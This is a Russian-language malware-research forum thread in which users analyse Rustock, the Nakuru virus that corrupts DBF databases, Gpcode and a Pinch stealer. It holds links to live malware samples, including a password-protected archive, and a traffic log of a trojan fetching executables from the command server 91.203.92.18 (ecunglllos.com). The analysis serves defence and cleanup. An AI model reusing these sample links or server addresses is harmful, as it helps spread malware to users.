В этом топике происходит исследование малвари: вирусни, троянов, как их вычистить и тд.

| Сообщение посчитали полезным:

Styx пишет:
Ничего такого в природе не встречал,
В том то и дело, и я не первый год...
Все ВАШИ рекомендации я конечно буду пробовать, но дело в том что не мой комп, а гл. буха и я немогу ей сказать: тетя, ты посиди часа три-четыре я тут помонитрю.... Сцуко, а фин. дир сказала ежли не победю будет "принимать меры" Я кончно пропатчил referent.exe на предмет самопроверки, но хочется докопаться до истины
[i]Styx пишет:
AVZ/
Это я первым делом запустил

| Сообщение посчитали полезным:

bad_boy пишет:
ReadOnly ставил
Бля, может конкуренты в фирму лезут(все таки налоговая отчетность) Но кааак? ниче не понимаю
Уже башню сносит Друг звонит, грит давай по пиву. Какое бля пиво Сцуко фантастика какая-то

| Сообщение посчитали полезным:

во вкладке безопасность, запрети запись в этот файл всем

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

какая то гадость сегодня пробралась
nod32 промолчал
если кому интересно проверте другими антивирусами


7513_30.05.2008_CRACKLAB.rU.tgz - virus2.rar

| Сообщение посчитали полезным:

reversecode
www.geocities.jp/kiskzo/wcg84.sys.html
www.fortiguardcenter.com/VirusEncyclopedia/search/encyclopediaSearch.do?method=quickSearchDirectly&virusName=W32/Agent.ODK!tr.dldr

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

crc1 пишет:
Так так так, ужо интересней. Тока я в Procmon не могу найти

Дык я тебе ж там директ линк дал:

download.sysinternals.com/Files/ProcessMonitor.zip

crc1 пишет:
я немогу ей сказать: тетя, ты посиди часа три-четыре я тут помонитрю....

Дык ты утром запусти, сверни, и пусть работает, в конце смены глянешь, было ли что-то...

ЗЫ. Что-то [Цитата] вставляет слово "пишет" в UTF-8, или это у меня бока?

-----
DREAMS CALL US

| Сообщение посчитали полезным:

www.viruslist.com/ru/analysis?pubid=204007614
анализ рустока ЛК, в дополнение описания на руткит.ком

| Сообщение посчитали полезным:

sER
Каспер выдал свою машину времени:
Варианты C3 и С4 относятся к 9-10 октября 2008 года. Их размер варьирует в пределах 158 400 — 158 496 байт.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

sER
мда, столько пафоса ...

-----
Crack your mind, save the planet

| Сообщение посчитали полезным:

Styx
Да... пафоса и нахваливания самих себя хоть отбавляй, хотя статья и действительно более развернута по сравнению с другими. Хотя обычному юзверу это нафиг не нужно (слишком много воды), а мне интересно было почитать. В статье так же они сами себе противоречат. Пишут что любая антивирусная компания могла засечь активность рустока юзая мониторы по изменению файловой системы + анализ трафика. Так а чего же они сами столько времени тянули если у них ловушки с сентября месяца нахватали столько экземпляров?

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

[HEX] пишет:
Каспер выдал свою машину времени:
да есть там пара описок.


[HEX] пишет:
любая антивирусная компания могла засечь активность рустока юзая мониторы по изменению файловой системы
или грузится с ливсиди и чекать размеры драйверов , это ж не простые юзерские машини и эту операцию можно производить регулярно.

Действительно интересно было прочитать про неуловимый дроппер, так как метод распространения и был загадкой.

| Сообщение посчитали полезным:

Столько инфы про группу IFrameBiz хз с какого года и никто не может вычеслить их?! К тому же в статье написали что они находяться в России. Странные у нас какие то оперативники сидят х пинают и карманы баблом наполняют и всем пох че там в инете твориться.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

Это не статья про русток, а шило. Из неё , по-моему, только можно понять - способ распространения и работы самого руткита, а механизмы которые он использует, каким образом в систему загружается - это не описано вообще, вывод - эта статья, просто описание начального этапа исследования руткита.
[HEX] пишет:
Так а чего же они сами столько времени тянули если у них ловушки с сентября месяца нахватали столько экземпляров? - русток попробуй вначале поотлаживать, а потом суди о работе людей по анализу, антиотладка - мощнейшая (натыкался на статью), код-гуамно полное, да, не легко разрабам аверов.

| Сообщение посчитали полезным:

pool
Смысл им на непрсвещеную публику выливать кучу технических подробностей?! Напишим им мылом авось и технические подробности скинут

Я себя с ними не сравниваю и не собираюсь. Они же сами себя нахваливают что за 8 дней справились с анализом по сравнению с вебом у которых ушел месяц. Хотя в тоже время говорят что вирусня была в ловушке с сентября 2007. Ну так в сентябре бы и выпустили защиту против рустока раз им все так легко далось по сравнению с другими.

-----
Computer Security Laboratory

| Сообщение посчитали полезным:

там же кстате есть статья про BootKit'ы - очень занятно.

| Сообщение посчитали полезным:

Может кто поможет разобратья с трояном...

подхватили достаточно старый вирус Virus.Win32.Nakuru.a. На Viruslist http://www.viruslist.com/en/viruses/encyclopedia?virusid=162058 о нем ничего. На Сnews http://safe.cnews.ru/bugtrack/entry/index.shtml?malicious/2008/03/31/107172 есть описание, но имхо, не верное.

Он создает копии doc файлов с расширением ехе, при запуске извлекается оригинальный doc файл и непосредственно вирус, который прописывается в автозагрузку и "портит" все dbf файлы на винте. Исходный файл удаляется.

В результате имеем кучу мертвых баз 1С

Создается впечатление что dbf-ки портятся не безвозвратно. Может кто-нибудь сможет разобраться что вирус делает с dbf-файлами.

В аттаче исходный зараженный файл (troy.exe) и файл, который в итоге записывается в автозагрузку (kspoold_u - видимо сам вирус). Пароль на архив 123.



862f_06.06.2008_CRACKLAB.rU.tgz - troy.rar

| Сообщение посчитали полезным:

shamann
завтра к вечеру смотри на http://totalmalwareinfo.com/ru http://totalmalwareinfo.com/ru
описаловка есть уже давно, просто не выложили, завтра обещали это исправить...

ЗЫ. если не будет там, я пробью и выложу тут...

-----
DREAMS CALL US

| Сообщение посчитали полезным:

=TS=, скажи, есть надежда восстановить dbf-ки?

| Сообщение посчитали полезным:

shamann
там, насколько я помню (давно это было), поролись первые килобайты файлов (вроде 8) и они нигде не сохранялись, в конец тоже писался мусор. И не только dbf, а еще какие-то форматы.

Насчет восстановить -- разве что ручками перезаписывать заголовок -- сформировать токой же файл без записей и в хекс-редакторе перенести на инфицированный файл

Хотя у тебя может быть другая модификация с тем же детектом... и соответсвенно обрабатывать

ЗЫ. вообще у таких файлов желательно менять расширение на незапускаемое во избежание случайностей...

-----
DREAMS CALL US

| Сообщение посчитали полезным:

файл (http://slil.ru/25857493)
Палится тремя антивирусниками как VIPRE.Suspicious и Mal/EncPk-DB

Вроде как тут подцепил installscash.org

****

Шлет по этому адрессу: 91.203.92.18:80 следующее:

Код
745 5420 2f70 726f 6773 2f74 6377 6165 GET /progs/tcwae
722f 7976 6472 697a 7165 2e70 6870 2048 r/yvdrizqe.php H
5454 502f 312e 310d 0a55 7365 722d 4167 TTP/1.1..User-Ag
656e 743a 204d 6f7a 696c 6c61 2f34 2e30 ent: Mozilla/4.0
2028 636f 6d70 6174 6962 6c65 3b20 4d53 (compatible; MS
4945 2037 2e30 3b20 5769 6e64 6f77 7320 IE 7.0; Windows
4e54 2035 2e31 3b20 2e4e 4554 2043 4c52 NT 5.1; .NET CLR
2031 2e31 2e34 3332 323b 202e 4e45 5420 1.1.4322; .NET
434c 5220 322e 302e 3530 3732 373b 202e CLR 2.0.50727; .
4e45 5420 434c 5220 332e 302e 3034 3530 NET CLR 3.0.0450
362e 3330 3b20 496e 666f 5061 7468 2e31 6.30; InfoPath.1
2976 6572 3331 0d0a 486f 7374 3a20 6563 )ver31..Host: ec
756e 676c 6c6c 6f73 2e63 6f6d 0d0a 0d0a



Получает в ответ исполняемый файл Который затем запускается, попутно изменяя некоторые значения реестра...

Затем создает файлы:

C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\iocgtkbfk[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\5E7EYQDH\rkopgkbp[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\BNPHK11H\zolcpgyy[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\C4H05OWL\pzari[1].htm
C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\MBYNVPWZ\fbcckkp[1].htm
c:\dskabvic.exe
c:\tpnva.exe

А затем он делает себя сервисом винды: RASMAN

Заием этот файл создает следующие процессы:
c:\dskabvic.exe
c:\tpnva.exe

....

Далее он зачем то коннектится вот сюда:

ecunglllos.com DNS_TYPE_A 91.203.92.18

Более подробный лог:

Код
91.203.92.18:80 - [ecunglllos.com]
Request: GET /progs/tcwaer/rkopgkbp.php?adv=adv502
Response: 200 "OK"
Request: GET /progs/tcwaer/iocgtkbfk.php
Response: 200 "OK"
Request: GET /progs/tcwaer/zolcpgyy.php
Response: 200 "OK"
Request: GET /progs/tcwaer/pzari.php
Response: 200 "OK"
Request: GET /progs/tcwaer/fbcckkp.php
Response: 200 "OK"
Request: GET /progs/tcwaer/yvdrizqe.php
Response: 200 "OK"


Скачавает еще пару исполняемых файлов, общим весом 75955 байт


Попутно изменяется параметры вот этого файла: C:\WINDOWS\system32\config\SysEvent.Evt



Первый файл стартует еще два процесса:
dskabvic.exe и tpnva.exe

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

=TS= а если файл меньше 8к, то он просто заполняется мусором?
И это действительно мусор, или может все-таки каким-то образом модифицированные исходные данные?

| Сообщение посчитали полезным:

shamann
Описаловка: totalmalwareinfo.com/ru/title=Virus.Win32.Nakuru.a

В этой версии "мусор" генерился рандомом. Файлы меньше 16 кил полностью перезаписываются.

Если нужно, могу выкинуть кусок листинга, отвечающий за порчу файлов баз данных.

-----
DREAMS CALL US

| Сообщение посчитали полезным:

=TS=, спасибо за помощь. Больше нигде информацию найти не мог.

Раз запись рендомная, то никакой листинг базы 1С уже не оживит...

| Сообщение посчитали полезным:

у кого есть экземпляр Gpcode ?

ЛК генерит взлом rsa "Stop GPCode"

вся инфа для факторизации есть на forum.kaspersky.com/showtopic=71637, но хотелось бы глянуть экземпляр из ww.

Ищется прежде всего ошибка в реализации, ибо фактаризация бессмыслена. Не большое/огромное число ПК, а ошибка/колизия.

| Сообщение посчитали полезным:

дык и попроси на форуме у каспера, у них написано, что они предоставят любую дополнительную информацию

-----
[nice coder and reverser]

| Сообщение посчитали полезным:

Hellspawn
Ну врят ли каспер начнет раздавать коллекцию, пусть ищет сам ;)

-----
DREAMS CALL US

| Сообщение посчитали полезным:

y-diman.narod.ru/P1025454.rar - новенькая хрень В общем говнопинч... Сам скринсервер не палится, но вот проактивка запуск след. файлов заблочила:

C:\DOCUME~1\user\LOCALS~1\Temp\1189019560(.jpg
C:\DOCUME~1\user\LOCALS~1\Temp\pinch.exe
C:\DOCUME~1\user\LOCALS~1\Temp\svchost.exe


Отчеты вроде мылом шлет

З.Ы. Абуза народу.ру уже ушла...

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

KingSise пишет:
Отчеты вроде мылом шлет

З.Ы. Абуза народу.ру уже ушла...
Если мылом то должен же быть пасс в трояне или там через MX записи?
--------
Все разобрал зверушку,шлет на ho.ua но мне чот лень абузу писать

| Сообщение посчитали полезным:

Помоему там для авторизации пас не нужен, сниффер не просек ничего... Тебе пасс то зачем, отчеты заюзать хочешь?

З.Ы. Все таки я бы похерил тему про пакеропротекторы... Вреда от нее больше чем пользы

-----
-=истина где-то рядом=-

| Сообщение посчитали полезным:

KingSise пишет:
Все таки я бы похерил тему про пакеропротекторы

Лучше наверное ее сделать закрытой/по рангу.
P.S. А там че было запаковано чем то новым из раздела пакеропротекторы?

-----
Nulla aetas ad discendum sera

| Сообщение посчитали полезным: